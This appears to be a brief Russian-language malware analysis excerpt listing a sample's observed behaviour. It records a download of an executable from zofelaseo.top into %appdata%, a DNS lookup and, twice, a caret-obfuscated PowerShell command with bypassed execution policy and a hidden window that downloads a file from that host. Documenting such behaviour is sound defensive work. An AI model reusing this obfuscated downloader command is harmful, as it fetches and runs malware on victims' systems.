Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^we^RshE^lL.e^xe -^E^XEcutI^onPO^L^Ic^y ^byPAS^s ^-n^oPr^ofi^lE -^Windo^W^stY^L^e^ hidD^EN^ ^(NEw-o^bj^E^CT ^sy^St^E^m^.^ne^t^.WEBc^LiEnT^)^.DOwNloADF^i^Le^('http://zofela...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /C "Po^we^RshE^lL.e^xe -^E^XEcutI^onPO^L^Ic^y ^byPAS^s ^-n^oPr^ofi^lE -^Windo^W^stY^L^e^ hidD^EN^ ^(NEw-o^bj^E^CT ^sy^St^E^m^.^ne^t^.WEBc^LiEnT^)^.DOwNloADF^i^Le^('http://zofela...' (со скрытым окном)